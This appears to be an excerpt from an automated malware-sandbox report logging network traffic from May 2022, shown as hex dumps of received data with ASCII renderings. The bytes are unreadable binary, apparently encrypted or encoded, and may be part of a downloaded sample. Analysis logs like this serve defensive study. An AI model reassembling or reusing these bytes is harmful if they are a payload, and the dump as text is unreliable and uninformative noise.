f0 58 b8 18 87 de 88 59 d3 be 6f 21 7d 80 8e 63 44 a4 28 3d 1b 34 f1 47 b6 92 e9 62 f6 60 e1 b8 47 3f a4 27 40 15 dd 44
                                                                                  Data Ascii: n$t\/N9Q<wmgpntO81~;4+-lpVYkEb30B+Pd&PA;fa*wbeOI&pA&#7 hE?/4[u7$gSSsWr!O ^X#hXYo!}cD(=4Gb`G?'@D
                                                                                  2022-05-02 11:03:15 UTC2486INData Raw: df be 15 77 46 42 44 f0 88 d6 5b 50 5c e1 8d e5 f7 61 e5 25 69 c2 e8 97 1c 91 c7 4a 5f ab c3 5e d4 ba 75 2d db 5d 0d dd 6b d3 9d 0b 67 60 f2 11 74 97 c3 79 77 e4 7b c2 78 e3 35 fd 2e 33 04 cf b1 df a8 cc 80 b1 c1 7e 8c f2 ef d3 89 b1 ce 42 69 95 7b f9 0c 6d 82 32 13 37 47 12 cf 72 dd 46 10 ab 96 12 3c 3a d6 b0 72 41 8e c6 aa 99 e2 d7 e2 bf da 2a cc 18 07 c0 2c dc 99 08 7b 2e 4d 9c 4a 75 8d 61 97 35 f1 24 2d d1 87 80 57 93 c0 23 91 d3 43 b4 69 c5 b2 ce ec 4b b6 fc b9 08 17 f0 ce d6 5a 39 7d 28 3c aa eb f3 6b ec 89 ce ce a7 19 a2 57 72 fe 29 b3 19 bf a0 6c 78 a6 2e 4f 59 bf 2e 62 69 f3 44 7b 43 10 94 35 fc 96 bc 37 72 1d 3c ab 34 33 ea f3 8c 58 31 0f c7 f1 d2 b1 33 d3 b8 9a 1e f9 24 0d 0d 09 f9 de 40 ce a1 0b cf f3 8f 8c bc f6 49 8d 75 3b af d8 22 46 7c 2f
                                                                                  Data Ascii: wFBD[P\a%iJ_^u-]kg`tyw{x5.3~Bi{m27GrF<:rA*,{.MJua5$-W#CiKZ9}(<kWr)lx.OY.biD{C57r<43X13$@Iu;"F|/
                                                                                  2022-05-02 11:03:15 UTC2487INData Raw: 0e 40 dd 06 45 20 34 67 b2 f5 ce 1c 07 21 58 a6 53 bc 6e ee 38 85 0b 7b 26 65 e6 6b 17 8a ec e5 7b fd f1 b7 aa 10 a1 a5 f1 91 38 81 d4 25 0f 5d a3 41 2f f1 68 4b a0 b1 cf 6e dc dd 46 90 4d 43 65 eb 11 e3 50 9e e3 40 a8 b5 6d 96 25 52 e7 bb 6c 37 72 96 dd fe 0a af 12 b5 bb 03 2f 2b 7c 17 bb bd 2e 56 c7 84 9e f5 f0 86 b4 0c 52 51 55 fb 5a cc 08 b5 20 b2 86 c6 88 8d 02 ff 80 4f b7 35 c8 05 68 04 1e 1e fe c5 67 4c a2 a3 0f 7e ae e5 0d e0 6f e6 28 a7 d4 b4 92 cc d2 99 e2 22 06 ff 6e 68 76 49 8f bf 27 5c ee 28 c1 58 72 c5 49 e1 ab ca 84 f8 99 11 a1 c5 a7 f7 ac b3 0b 62 fc a0 15 0b e9 70 8e 4c 5e dd d3 5a d1 35 47 5a 5a 30 a7 d7 c0 00 de 76 83 32 35 e8 1d e2 52 dd 35 53 84 08 2a c1 52 b5 3d c4 d1 08 04 6e a6 c3 3f 91 f9 97 a4 f4 b7 3e af 1c 71 74 a7 8b 1c a3 fd
                                                                                  Data Ascii: @E 4g!XSn8{&ek{8%]A/hKnFMCeP@m%Rl7r/+|.VRQUZ O5hgL~o("nhvI'\(XrIbpL^Z5GZZ0v25R5S*R=n?>qt
                                                                                  2022-05-02 11:03:15 UTC2488INData Raw: db 98 98 44 4f 64 c1 71 ad f5 3b 1c 49 a5 3a 96 4b c5 c4 a3 43 bf ca b2 90 8d b2 f1 36 32 ac 75 2e 52 0a 22 82 55 1b 32 48 6b e8 14 ec 5f 30 86 e7 00 df 3f a4 45 29 df c7 2d e9 dd e1 e7 81 fc 22 d6 df da ac f8 09 ea 30 2e b2 54 cf 0e f6 bf 42 e7 03 e6 f0 d8 8c d7 cd 0f 9f 79 71 11 af 6b a1 2c 1a 74 e9 5e 53 31 9d 4e c6 46 6d 2f db f6 33 be 4c 58 e2 64 76 a6 0a 9a af 34 b6 97 a9 bb cc e5 90 d6 64 9f 0d 82 f0 cf 6a 93 f0 2e a7 5c 32 d2 e1 f8 59 1e 43 8a 79 77 4f f5 df 6f 3f a3 36 97 96 d2 27 de f8 7f 1f d3 1e 8c a3 73 52 60 9e 3d ec 32 48 bd b7 cd 0c 26 17 25 32 36 98 7a 22 73 9d ca e0 46 9f e7 56 63 56 63 85 56 5b e4 31 e8 35 fb 90 81 7d 0b 51 1e d5 a3 17 7f 82 66 52 58 6d f0 fe 4b c1 36 b5 51 37 54 e7 3e 48 82 71 b7 f2 64 0c 36 8f 95 99 21 e9 09 81 a4 00
                                                                                  Data Ascii: DOdq;I:KC62u.R"U2Hk_0?E)-"0.TByqk,t^S1NFm/3LXdv4dj.\2YCywOo?6'sR`=2H&%26z"sFVcVcV[15}QfRXmK6Q7T>Hqd6!
                                                                                  2022-05-02 11:03:15 UTC2490INData Raw: c5 9f e0 70 cd c8 fb 6e 4e 48 93 24 3c 65 4b ce f8 32 36 a9 b9 d2 fd 48 a1 c6 3a a7 01 6a 60 53 98 ee 4a 2c 27 5e 09 85 25 0a 99 47 3d 9a 6a df 12 2e 3b 7e e5 64 02 71 3e 53 c7 6a 87 a5 35 5f 02 0a 53 50 30 f6 61 9b 77 d4 fb 3a 0a 7b 35 87 16 9f 8f 8b ae 36 4e dc fb 13 9a 45 f4 bc e4 52 26 56 41 7d 30 33 99 94 2a 17 aa f8 23 a5 80 48 cc 17 30 d5 f9 c1 36 ce c5 11 6e 49 05 1b a2 c1 00 11 b0 b6 e3 b3 68 e4 93 84 c0 0a 98 96 35 7d e0 8b af 39 54 10 e0 a1 4d e7 04 f7 ed e9 a7 5e af a5 b8 9d 7d 90 8d 2b da e0 a2 40 a2 47 d8 b7 c6 14 20 6d 9f cc bf ec 39 2f 6b fc 81 75 d2 97 f6 d5 70 19 15 12 63 28 09 12 b3 aa 87 c7 e4 6e 0a 16 20 dc 99 41 dd 5f 5b 74 c6 48 09 42 db c3 99 cf f1 a1 6d 57 d3 08 cd 96 b7 43 6d f8 81 f4 82 6d 11 62 f3 e3 ef 1d 59 91 2a 12 73 eb e1
                                                                                  Data Ascii: pnNH$<eK26H:j`SJ,'^%G=j.;~dq>Sj5_SP0aw:{56NER&VA}03*#H06nIh5}9TM^}+@G m9/kupc(n A_[tHBmWCmmbY*s
                                                                                  2022-05-02 11:03:15 UTC2491INData Raw: 40 80 a0 ac 49 40 80 a0 89 ab 92 0f d4 e3 e8 bc 88 37 12 d6 f5 a2 83 88 40 80 a0 ac 49 40 80 a0 9d ab 92 1a a8 bf 8a 93 88 77 77 15 84 be 94 8a 88 40 80 a0 ac 49 40 80 a0 9a ab 92 14 8f cd c2 aa 88 37 08 04 88 1e fb 84 e2 8c 88 40 80 a0 ac 49 40 80 9f 94 ab 92 1b a2 bf a9 b0 88 92 06 ea 81 fe ac 88 92 1e ef b8 c5 bc 88 03 a7 86 92 a0 88 40 80 a0 ac 49 40 80 9f 9f ab 92 0b c4 b2 8f 9c 88 08 06 88 34 58 dd e8 8f 88 1f a5 ec e2 be 88 40 80 a0 ac 49 40 80 9f a0 ab 92 0e c9 84 d3 9f 88 37 11 b6 fb ac a1 88 40 80 a0 ac 49 40 80 a0 8c ab 92 17 dd ab e6 9d 88 92 10 b7 95 c5 be 88 0c d3 d2 b1 8e 88 40 80 a0 ac 49 40 80 a0 a0 ab 92 17 f1 9b f3 bb 88 92 07 bc e2 a9 b8 88 77 0f b2 86 a5 bc 88 40 80 a0 ac 49 40 80 9f 89 ab 92 18 fc 8c fd 8e 88 1c 02 88 1f d2 cb f8 ad
                                                                                  Data Ascii: @I@7@I@ww@I@7@I@@I@4X@I@7@I@@I@w@I@
                                                                                  2022-05-02 11:03:15 UTC2492INData Raw: ff c5 f6 88 37 10 d4 bd e8 8b 88 40 80 a0 ac 49 40 80 9f 8d ab 92 1f e2 8d da 86 88 1c 03 88 1e 90 ed d0 b1 88 40 80 a0 ac 49 40 80 9f b1 ab 92 18 a1 ed 87 b0 88 37 0b 05 d8 d2 89 ad 88 06 c8 b3 df b9 88 40 80 a0 ac 49 40 80 a0 8b ab 92 1f a6 b4 94 b6 88 1c 04 88 08 05 88 0d d3 9a 8a 9b 88 40 80 a0 ac 49 40 80 a0 98 ab 92 13 c4 fd ce 83 88 0b 10 83 8a 84 99 88 0b 1a 87 c4 8e b1 88 0f 85 ee ab 93 88 40 80 a0 ac 49 40 80 9f 91 ab 92 0b f3 82 cf 9c 88 0b 0b aa c8 88 83 88 37 1c dd db fb 9d 88 40 80 a0 ac 49 40 80 9f b9 ab 92 5d b8 b3 ad 88 1c 01 88 77 1e c5 8f 98 a4 88 40 80 a0 ac 49 40 80 a0 ad ab 92 10 ac 80 97 a0 88 08 01 88 0f a2 e2 8c 9d 88 40 80 a0 ac 49 40 80 a0 b1 ab 92 1b ba be cd 99 88 0b 10 83 8a 84 99 88 0b 1a 87 c4 8e b1 88 0f 85 ee ab 93 88 40
                                                                                  Data Ascii: 7@I@@I@7@I@@I@@I@7@I@]w@I@@I@@
                                                                                  2022-05-02 11:03:15 UTC2494INData Raw: 0f 24 88 10 0b 01 aa 88 01 95 88 0d 88 02 1d 1d 8e 0f 1c 88 0d 48 0b 1f 88 3b 88 1d 8d 0f 00 48 04 87 88 10 07 1d 0d 88 02 1d 1d 8e 0f 0e 88 7d 1d 8e 47 60 80 b1 9e 69 0c 88 07 48 34 01 8f 88 03 af 88 1d 8e 0f 05 82 88 7d 1d 8e 97 60 80 b1 9f 69 01 94 88 02 48 10 80 80 a3 5e 10 88 1d 8e 0f 03 84 88 0d 48 0b 01 80 88 01 9f 88 1d 8e 0f 04 93 88 10 34 34 88 02 9c 88 0a 88 01 1d 1d 8e 0f 16 88 7d 1d 8e 47 60 80 b1 9f 69 02 bb 88 10 07 1d 0b 88 02 1d 1d 8e 0f 04 82 88 0d 48 0b 11 88 02 8d 88 1d 8e 0f 01 ba 88 7d 1d 8e 97 60 80 b1 9e 69 03 8f 88 10 34 01 88 88 03 98 88 0e 88 02 1d 1d 8e 0f 37 88 07 48 34 01 a5 88 03 8d 88 1d 8e 0f 05 85 88 10 0d 1d 19 88 01 1d 1d 8e 0f 04 88 88 10 07 1d 03 88 02 1d 1d 8e 0f 27 88 7d 1d 8e 97 60 80 b1 9f 69 10 88 10 34 3d 88 02
                                                                                  Data Ascii: $H;H}G`iH4}`iH^H44}G`iH}`i47H4'}`i4=
                                                                                  2022-05-02 11:03:15 UTC2495INData Raw: 88 03 b3 88 1d 8e 0f 03 ad 88 10 0d 1d 11 88 01 1d 1d 8d 0f 00 48 04 9f 88 10 07 1d 02 88 02 1d 1d 8e 0f 02 b0 88 10 0b 01 90 88 01 a5 88 00 88 01 1d 1d 8e 0f 03 a5 88 10 34 01 88 88 03 98 88 17 88 01 1d 1d 8e 0f 02 b8 88 7d 1d 8e 47 60 80 b1 9f 69 03 a4 88 10 34 08 88 08 88 10 88 01 1d 1d 8e 0f 02 83 88 10 0b 38 88 34 88 0f 88 02 1d 1d 8e 0f 04 bf 88 7d 1d 8e 97 60 80 b1 9f 69 02 85 88 10 07 1d 06 88 02 1d 1d 8e 0f 2a 88 40 80 9c a8 32 01 90 88 1d 8e 0f 02 84 88 0d 48 0b 01 96 88 2c 88 1d 8e 0f 03 ab 88 7d 1d 8e 97 60 80 b1 9f 69 02 8b 88 10 0d 1d 05 88 01 1d 1d 8e 0f 05 94 88 10 0b 01 9f 88 01 aa 88 05 88 01 1d 1d 8e 0f 02 87 88 10 34 01 91 88 03 b4 88 01 88 01 1d 1d 8e 0f 01 9f 88 7d 1d 8e 97 60 80 b1 9f 69 01 95 88 10 7f 00 88 05 1d 01 88 0b 1d 1d 8e
                                                                                  Data Ascii: H4}G`i484}`i*@2H,}`i4}`i
                                                                                  2022-05-02 11:03:15 UTC2496INData Raw: 80 b1 9e 69 05 88 10 07 1d 07 88 02 1d 1d 8e 0f 05 9e 88 10 0b 01 86 88 02 95 88 08 88 02 1d 1d 8e 0f 1d 88 7d 1d 8e 97 60 80 b1 9f 69 0b 88 07 48 34 2b 88 02 81 88 1d 8e 0f 04 94 88 7d 1d 8e 97 60 80 b1 9f 69 04 82 88 10 0b 01 9d 88 01 b1 88 17 88 01 1d 1d 8d 0f 00 48 05 88 88 10 07 1d 08 88 02 1d 1d 8e 0f 02 9a 88 10 0b 0d 88 38 88 0f 88 01 1d 1d 8e 0f 04 8d 88 7d 1d 8e 97 60 80 b1 9e 69 05 8c 88 10 0b 01 9c 88 01 99 88 07 88 01 1d 1d 8e 0f 15 88 10 07 1d 06 88 02 1d 1d 8e 0f 3b 88 0d 48 0b 01 95 88 01 9d 88 1d 8d 0f 00 48 04 ae 88 10 2b 92 7f 04 1d 0b 1d 7f 04 1d 03 1d 04 1d 03 1d 1d 8d 0f 00 48 05 93 88 08 48 60 80 b1 96 69 0b 1d 03 1d 60 80 b1 95 69 01 88 ad 60 80 b1 94 69 1d 8d 0f 00 48 04 81 88 07 48 0b 10 88 02 a2 88 1d 8d 0f 00 48 02 b5 88 07 48
                                                                                  Data Ascii: i}`iH4+}`iH8}`i;HH+HH`i`i`iHHHH
                                                                                  2022-05-02 11:03:15 UTC2498INData Raw: 02 87 88 1d 8e 0f 01 a7 88 10 0b 01 83 88 01 83 88 03 88 01 1d 1d 8e 0f 01 b1 88 7d 1d 8e 97 60 80 b1 9f 69 0e 88 0d 48 34 2d 88 02 88 88 1d 8d 0f 00 48 04 b6 88 10 0d 1d 1a 88 01 1d 1d 8e 0f 2d 88 7d 1d 8e 47 60 80 b1 9f 69 05 9d 88 10 07 1d 04 88 02 1d 1d 8e 0f 04 a5 88 7d 1d 8e 47 60 80 b1 9e 69 02 b5 88 10 0d 1d 08 88 01 1d 1d 8d 0f 00 48 05 95 88 10 0b 2d 88 02 a8 88 0e 88 02 1d 1d 8e 0f 04 89 88 3b b4 97 60 80 b1 9d 69 55 60 80 b1 9c 69 40 80 9c a3 49 1d 8e 0f 12 88 7d 1d 8e 97 60 80 b1 9e 69 01 b0 88 10 0b 01 8e 88 15 88 00 88 01 1d 1d 8e 0f 01 b7 88 10 34 01 92 88 03 b7 88 18 88 01 1d 1d 8e 0f 02 94 88 0d 48 34 35 88 02 92 88 1d 8e 0f 03 af 88 7d 1d 8e 47 60 80 b1 9f 69 04 98 88 07 48 0b 01 ab 88 0b 88 1d 8e 0f 02 b8 88 7d 1d 8e 47 60 80 b1 9e 69
                                                                                  Data Ascii: }`iH4-H-}G`i}G`iH-;`iU`i@I}`i4H45}G`iH}G`i
                                                                                  2022-05-02 11:03:15 UTC2499INData Raw: 3d 88 02 b8 88 0d 88 01 1d 1d 8e 0f 10 88 7d 1d 8e 97 60 80 b1 9e 69 01 8d 88 10 0d 1d 11 88 01 1d 1d 8e 0f 02 a1 88 7d 1d 8e 47 60 80 b1 9e 69 01 80 88 10 0d 1d 02 88 01 1d 1d 8e 0f 01 82 88 10 0b 01 a2 88 14 88 06 88 01 1d 1d 8e 0f 02 a5 88 7d 1d 8e 47 60 80 b1 9e 69 3f 88 0d 48 34 01 92 88 03 b6 88 1d 8e 0f 13 88 0d 48 34 01 94 88 03 bc 88 1d 8e 0f 05 96 88 10 0b 01 a4 88 01 95 88 09 88 01 1d 1d 8e 0f 01 87 88 10 0b 2a 88 02 a3 88 1f 88 01 1d 1d 8e 0f 03 88 88 10 0d 1d 15 88 01 1d 1d 8e 0f 02 88 88 07 48 34 2a 88 01 be 88 1d 8e 0f 01 b9 88 7d 1d 8e 47 60 80 b1 9f 69 04 9c 88 10 34 3b 88 02 b1 88 1c 88 01 1d 1d 8e 0f 03 99 88 07 48 0b 01 ad 88 01 a9 88 1d 8e 0f 02 a6 88 07 48 34 2c 88 02 86 88 1d 8d 0f 00 48 05 80 88 0d 48 0b 01 a3 88 2f 88 1d 8d 0f 00
                                                                                  Data Ascii: =}`i}G`i}G`i?H4H4*H4*}G`i4;HH4,HH/
                                                                                  2022-05-02 11:03:15 UTC2500INData Raw: 01 a0 80 80 a3 69 20 80 86 81 19 1d 87 47 11 1d 1c bc 57 7d 1c bc 57 01 a0 80 8e 8c 62 17 1d 1c b9 47 17 1d a3 1c b4 57 11 48 01 88 7d 1c b4 57 11 48 9d 00 88 01 a0 80 8e a6 62 22 1d 10 1d 01 a0 80 83 ab 62 0f 1d 40 80 9c 8c 49 01 a0 80 8a 9c 69 22 1d 22 48 01 a0 80 8e 8b 62 1f 1d 17 1d 01 a0 80 81 a7 62 20 1d 18 1d 7d 01 a0 80 8e a5 62 00 88 00 88 10 80 80 a3 5e 00 88 0f 1d 1a bf a0 1c 1d 23 1d 23 48 0b 01 88 23 1d 1b 95 18 00 88 24 1d 24 48 34 27 1d 24 1d 60 80 b0 a5 69 19 1d 27 1d 18 1d 0f 1d 27 48 15 01 a0 80 8e a4 69 36 24 1d 34 26 1d 20 1d 1c 8f 0f 60 80 b0 a5 69 19 1d 24 1d 18 1d 0f 1d 1b bb a0 21 1d 26 1d 1c 8c 0f 01 a0 80 81 a7 62 0b 36 28 1d 01 a0 80 8e a3 62 ad 18 1d 24 48 34 28 1d 24 1d 1c 8f 53 24 1d 28 1d 28 48 15 34 26 1d 21 1d 1b b2 1f 21
                                                                                  Data Ascii: i GW}WbGWH}WHb"b@Ii""Hbb }b^##H#$$H4'$`i''Hi6$4& `i$!&b6(b$H4($S$((H4&!!
                                                                                  2022-05-02 11:03:15 UTC2504INData Raw: b0 37 d6 ae 16 43 80 a8 4d e3 dc 15 fe ef 49 29 b8 3f 1a 10 97 26 16 03 c8 83 c2 38 ef 97 8f 24 1b eb eb f6 90 2b 1d 4e 2c ba 77 0b e8 44 a6 b4 9a ab d3 e4 60 25 b2 60 19 5d 22 27 fa 98 e2 c8 af fd 39 87 89 fc c9 9d e5 07 d1 6d 93 25 29 7b b5 14 7a f1 e3 d6 94 4f 55 ac 13 65 24 dc 44 dd 50 bd c8 ae 7c b1 6c 17 b4 16 ad 31 9f d7 5e 5f 11 d9 5b fb f8 9f 33 86 b3 3e b0 6e 53 5f 47 4b 23 4c 6c 05 eb eb f6 fc 6e d5 d2 63 61 0a e7 6a eb eb f6 a9 0c e8 c4 2f af cb 54 78 aa eb eb f6 b9 6d 15 af 2f d7 9a b0 7b 9a 6a 15 12 77 f1 d8 17 99 ab ca 5c d1 58 1d b3 91 55 00 92 fc e7 97 c0 76 05 34 61 53 e1 a5 45 19 0a 24 e0 0f 0b 1d 2b 2a 5d f8 89 18 58 ad 7d 53 05 da b6 59 4b 39 8f 12 78 ab 06 5a 3b 2e 4a ac e1 0b df 08 bd 01 34 12 8d ed c5 99 87 3a 5a 9e 42 59 b9 1d 1a
                                                                                  Data Ascii: 7CMI)?&8$+N,wD`%`]"'9m%){zOUe$DP|l1^_[3>nS_GK#Llncaj/Txm/{jw\XUv4aSE$+*]X}SYK9xZ;.J4:ZBY
                                                                                  2022-05-02 11:03:15 UTC2509INData Raw: b0 4f 1f a1 35 ee 6a d1 ee 71 26 f3 44 39 4b c4 3c ca a6 eb eb e6 bb 45 07 6e 9b b5 c4 98 a0 20 a8 0a 06 ae eb eb e6 81 38 e3 69 86 8f d2 3f a3 39 41 e3 af 91 eb eb e6 90 82 6d 2f 7c 15 2e 3f ec 98 68 0b e5 43 86 98 ef 88 eb eb e9 63 33 0c 59 b1 1b 56 d9 3b a5 71 d5 0e 57 a9 c6 09 fb f9 5a eb eb e9 56 a3 62 17 ec 91 74 04 59 42 d4 96 aa 71 7f e4 ec eb eb e9 57 ba f6 b0 df 0e eb 9c 00 ed 5d 95 ac 20 eb eb e9 23 a8 30 cb 49 c0 b6 2d f0 fd b0 9b a7 ae 26 2e 39 eb eb e9 30 5c 63 43 87 25 f5 76 11 50 85 3c 90 12 c6 6b 06 1f eb eb e9 1e 8b 0c 08 d8 fc 28 be eb 47 ca e9 7d be 7a b4 22 d1 86 27 51 d5 eb 59 eb eb e9 f9 af 14 71 23 25 fd 4e cd a5 e8 9f dc eb eb e9 f4 83 01 dd 94 25 e0 45 c9 01 b2 80 9a 34 6a a3 30 b3 eb eb e9 de c0 9b e2 f8 87 62 61 6a 01 63 0d 49
                                                                                  Data Ascii: O5jq&D9K<En 8i?9Am/|.?hCc3YV;qWZVbtYBqW] #0I-&.90\cC%vP<k(G}z"'QYq#%N%E4j0bajcI
                                                                                  2022-05-02 11:03:15 UTC2511INData Raw: 2a 8a 6e fa ce 6e 8a 1e 5a fa 1e 8a 8a 2a ce 5a 2a 8a 6e fa ce 6e 8a 1e 5a fa 1e 8a 8a 2a ce 5a 7d dd 39 ad 99 39 dd 49 0d ad 49 dd dd 7d 99 0d 7d dd 39 ad 99 39 dd 49 0d ad 49 dd dd 7d 99 0d c0 60 84 10 24 84 60 f4 b0 10 f4 60 60 c0 24 b0 c0 60 84 10 24 84 60 f4 b0 10 f4 60 60 c0 24 b0 bc 1c f8 6c 58 f8 1c 88 cc 6c 88 1c 1c bc 58 cc bc 1c f8 6c 58 f8 1c 88 cc 6c 88 1c 1c bc 58 cc db 7b 9f 0b 3f 9f 7b ef ab 0b ef 7b 7b db 3f ab db 7b 9f 0b 3f 9f 7b ef ab 0b ef 7b 7b db 3f ab 89 29 cd 59 6d cd 29 bd f9 59 bd 29 29 89 6d f9 89 29 cd 59 6d cd 29 bd f9 59 bd 29 29 89 6d f9 e3 43 a7 33 07 a7 43 d7 93 33 d7 43 43 e3 07 93 e3 43 a7 33 07 a7 78 f7 93 33 d7 4f 43 e0 e7 93 5e fe 1a 8e ba 1a fe 6a 2e 8e 6a fe fe 5e ba 2e 5e fe 1a 8e ba 1a fe 6a 2e 8e 6a fe fe 5e ba
                                                                                  Data Ascii: *nnZ*Z*nnZ*Z}99II}}99II}`$```$`$```$lXlXlXlX{?{{{?{?{{{?)Ym)Y))m)Ym)Y))mC3C3CCC3x3OC^j.j^.^j.j^
                                                                                  2022-05-02 11:03:15 UTC2515INData Raw: d7 2d 31 7a 08 fe 03 c2 11 40 0a 7b fb 4b 95 e9 15 19 7a 52 e5 53 6d be 15 7d 2f 00 cc 71 70 9f d1 87 81 78 d3 94 a3 49 4a 03 15 2f 0d 28 bc 95 5c 98 d7 14 d2 2f 68 70 3e b3 e2 a3 f4 95 89 76 93 b3 03 b2 7a 24 05 f9 d4 65 0c ab 99 58 ef e0 45 d8 f8 4b ad db bf b3 41 cd 7e cb fd 27 e0 d8 d7 8f 17 bb 96 8d 9b 8f 61 12 16 1f 1b 78 ac 6d 22 94 d3 e9 45 17 87 fd 97 91 e0 40 8b c2 73 43 33 c2 4c 12 db 4e 04 a3 a6 b3 4c aa bd c7 6b bf 23 9f f4 3e 32 e2 4f 2f 4f 31 f4 31 20 8b 62 3a 93 17 bd da 0b 92 0b 43 44 41 de 07 ab e4 70 fb 84 86 f6 5a 29 e4 5c a8 7b bf ba 8e 38 6b 58 fc 3a d7 4f 05 31 71 61 e4 3d 88 28 11 f1 7e 53 8a 92 df ec c9 6e 62 c6 ae 36 eb e5 2a 6c 37 f3 df 47 40 0a 2e a8 fd 90 81 79 18 f3 dc 8b 47 22 c5 7d f3 4a 75 f7 c6 7f ea 62 59 04 3b 9e 4a 8d
                                                                                  Data Ascii: -1z@{KzRSm}/qpxIJ/(\/hp>vz$eXEKA~'axm"E@sC3LNLk#>2O/O11 b:CDApZ)\{8kX:O1qa=(~Snb6*l7G@.yG"}JubY;J
                                                                                  2022-05-02 11:03:15 UTC2519INData Raw: 97 6a ba 85 67 fb 6c 78 42 21 6a b6 d3 32 a8 63 19 3c 62 91 cd 0f 11 23 ca b3 47 ac 62 05 54 4f 18 2c 85 c4 df 0c 80 95 ce c7 98 b2 a4 47 97 dd 3f 77 e2 46 0d 3e 60 f3 8f 3d 10 29 fb db 9f 8b 68 6b 52 2b 54 78 2a b3 87 1d b4 65 4d bb 5b 4d 8f 23 c4 68 05 25 76 92 ae c9 69 a2 55 2b 5e 39 3a 90 21 6c 3b 06 e1 89 52 b6 e8 87 b1 d5 50 00 5a d0 75 d3 87 f1 10 4e 59 06 55 1d 6c b4 6c 86 45 8c 0f 26 ed 4c d3 c5 e2 e3 c0 e0 eb fa 0e 09 a5 18 61 30 79 72 94 9a 82 e6 bb f5 40 cc 1d 06 85 c3 f4 77 ca e0 65 b9 88 b6 d1 31 f9 78 19 0e d3 33 c0 2a 10 a9 c9 42 72 ff 7d 24 d2 3a 4a 30 3d 77 0e 02 c5 ac ab cb df 77 61 60 2f c3 51 df 44 f2 2d 3b 64 fd 06 e9 1d 05 5c 13 e1 32 76 98 f0 59 c8 f0 20 25 b7 2f 5a a7 5b 75 82 f0 cf ce 7f a8 a8 74 f5 5a 0a 0c 99 66 1e e4 b2 f1 35
                                                                                  Data Ascii: jglxB!j2c<b#GbTO,G?wF>`=)hkR+Tx*eM[M#h%viU+^9:!l;RPZuNYUllE&La0yr@we1x3*Br}$:J0=wwa`/QD-;d\2vY %/Z[utZf5
                                                                                  2022-05-02 11:03:15 UTC2523INData Raw: 3b 6e bf ef fd b2 0d e4 21 7a 70 9e ad 90 f7 f9 82 44 cb f7 14 bf fa fa 3d 79 6b fa dd ac 6c 02 8a 9f a5 42 85 ae 99 e8 fc 11 53 7f 61 32 3c 8c 18 e2 d6 68 b2 37 2d 5e 01 f2 f8 4c 41 53 c3 12 7a 3a c8 f4 cd c8 d7 c5 ad db f9 0f ba c3 e1 4a e3 29 30 52 8d 6a ca 7f d9 72 05 02 32 b6 05 22 0c 6b 4d b3 06 50 7f c7 40 9b 12 22 c7 73 57 21 d4 9d ce 91 d4 a4 73 d8 32 b4 04 ad 9b b8 12 ba 78 4e 02 aa fb 8a 30 56 5f 78 e2 d5 ec 9a 1b 47 cb 11 74 39 46 c2 34 90 f6 86 b6 5b 4d 2e 03 0c d1 41 bb 92 c2 54 c5 20 c3 69 6a 7b f7 ef f7 5e 49 7a a7 c9 d9 89 35 51 2a fd 8c b9 31 3a ef d8 8b db 2c ca 9e 23 2a 65 6a 0e 9e 11 4a 5a a8 ee 4e f4 4e cc c7 b8 d2 cf e7 7c f8 1f 34 68 a8 1c ae fd 88 a5 90 c5 18 72 d5 b4 e9 11 b3 45 6d 5f ed 57 39 33 f3 e1 4f ac 92 da 45 52 ad d2 a1
                                                                                  Data Ascii: ;n!zpD=yklBSa2<h7-^LASz:J)0Rjr2"kMP@"sW!s2xN0V_xGt9F4[M.AT ij{^Iz5Q*1:,#*ejJZNN|4hrEm_W93OER
                                                                                  2022-05-02 11:03:15 UTC2527INData Raw: ef de 65 c3 ba 29 df c0 71 85 44 fa 30 37 68 32 42 76 c4 a9 48 99 aa 49 89 cd f7 ed b0 e3 78 22 32 a9 43 fa 07 23 fc e9 6c cd b2 2c 4f ec 8c 1c c4 50 32 90 08 21 db bb a4 d9 a1 87 fd 37 e7 11 9c cb a4 3a 12 67 af d1 58 9c dc 9b 9c 3b 28 7c 6c 75 3e 80 e0 9d 65 fa 90 45 ba c0 37 5a cb b8 63 71 25 20 73 f3 83 54 b1 1e f4 65 b1 f2 05 d1 95 b2 23 79 0b 9d 09 f0 93 24 9a 47 7d 77 d3 76 70 2c f3 ca f9 39 ab 70 46 dd c6 b4 3d 72 49 8d 12 a9 71 9d 97 98 f7 48 0a 2d 90 b7 2d ac 9f 01 8b ee 29 e2 58 3e b3 8c 15 bd f1 ec b1 ce f3 ab 38 e0 31 d3 5c 2c e8 a9 6a c0 67 6a 12 27 5c b9 d4 b8 9a 6a 78 07 99 1c f5 9c 6b e9 16 75 05 70 3f 3f 10 ee 41 86 7d 7f 52 02 f2 63 aa ad f1 31 c8 98 d9 a5 b9 78 9d e6 72 14 79 24 38 2c ac a6 67 14 ca b5 a6 22 0e 63 ca d8 75 94 7a eb 2f
                                                                                  Data Ascii: e)qD07h2BvHIx"2C#l,OP2!7:gX;(|lu>eE7Zcq% sTe#y$G}wvp,9pF=rIqH--)X>81\,jgj'\jxkup??A}Rc1xry$8,g"cuz/
                                                                                  2022-05-02 11:03:15 UTC2532INData Raw: ae e5 0a 07 80 f8 06 25 42 c8 25 46 17 cf 34 2c 1d 4b ca fc 09 4b ec e1 43 c2 9d 04 02 fb 95 af a7 db ff 8a ed 5e d6 00 43 a9 36 15 7b db 74 86 b7 3b d1 b6 bc b5 10 6a 37 19 75 17 60 71 a8 c3 e7 06 29 40 e9 5b e9 12 64 49 ba be db 98 bc 34 7e 18 0a 62 6b 36 18 4e e7 dd 6a e2 22 8e 76 f7 88 fa b3 3c d5 15 a0 27 6f c1 9b a0 57 e2 f2 00 1b d1 dd 0e bf a4 73 a6 21 22 21 e6 dd 84 17 35 c7 3c 68 01 54 75 b7 74 78 35 c1 e0 20 e8 7d 06 46 c5 f2 63 65 6a 57 d2 43 f4 cf 73 28 37 3f d1 42 13 e7 1c 50 2a 69 87 08 e1 75 1d 50 fe cf 58 af 55 d3 a8 8d 1a cc 44 cf d5 3c 41 20 f9 f0 4f 15 d5 60 39 a1 e2 18 15 cf 8d 37 b6 c3 aa c9 19 3d 3f 2d ac 57 c6 b7 a1 70 d5 bf 4e c5 4c 8d 4c 32 98 5b af 3d e2 54 59 93 41 35 1f 3f d3 3e 6d de 9d 02 64 24 24 ee 2e 50 0f 0e 61 7e f5 be
                                                                                  Data Ascii: %B%F4,KKC^C6{t;j7u`q)@[dI4~bk6Nj"v<'oWs!"!5<hTutx5 }FcejWCs(7?BP*iuPXUD<A O`97=?-WpNLL2[=TYA5?>md$$.Pa~
